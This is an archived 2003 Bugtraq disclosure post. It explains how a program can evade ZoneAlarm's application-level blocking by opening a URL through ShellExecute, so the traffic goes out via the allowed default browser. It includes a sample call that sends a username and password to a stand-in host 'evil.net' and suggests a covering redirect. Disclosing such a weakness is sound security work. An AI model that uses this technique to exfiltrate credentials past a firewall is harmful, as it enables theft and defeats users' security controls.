lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030623061246.7134.qmail@www.securityfocus.com>
Date: 23 Jun 2003 06:12:46 -0000
From: <aceh@...vetch.bg>
To: bugtraq@...urityfocus.com
Subject: Bypassing ZoneAlarm (limited)





Hi everyone. 
I don't know if this is a new issue but it is a simple way to
bypass (in some limited form) ZoneAlarm's Application level 
Internet access blocking.

Windows dll shell32.dll exports a well known and documented function called
ShellExecute. From Win32 Programmer's refference:

>HINSTANCE ShellExecute(
>  HWND hwnd,	          // handle to parent window
>  LPCTSTR lpOperation,    // pointer to string that specifies 
>                          // operation to perform
>  LPCTSTR lpFile,	  // pointer to filename or folder name string
>  LPCTSTR lpParameters,	  // pointer to string that specifies 
>                          //executable-file parameters 
>  LPCTSTR lpDirectory,    // pointer to string that specifies default 
directory
>  INT nShowCmd            // whether file is shown when opened
>  );

When the lpFile parameter is an Internet url, windows invokes Internet 
Explorer (or more accurately - the default web browser), which in 99% of 
the cases is allowed to access Internet, with that url. Example:

ShellExecute(
  0,
  "open",
  "http://evil.net/collect.cgiun=stolen_username&pw=stollen_password"
  0,
  0,
  SW_HIDE //This doesn't work. 
          //I think it is supposed to hide the window but ...
  );

The collect.cgi (after storing stolen_username/stolen_password) could 
redirect the user for example to 
windowsupdate.microsoft.com, 
so that many users will not even suspect anything.

The info leaked is limited by the maximum allowed url length, but that 
could be more than enough for a malicious application to send some 
username/password/cookie/cc_number info to malicious server.

This was tested on ZoneAlarm 3.1.395 (freeware) but i guess that all
versions can be tricked if the user has granted access to his default
web browser by default (very likely)

VENDOR STATUS:
I thing that this is flaw in the core design of ZoneAlarm 
(and/or Windows) and don't see a way it can be fixed.

WORKAROUND:
Do not allow ANY application to access Internet by default and 
review each request separately.

Any comments are wellcome.
aceh


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ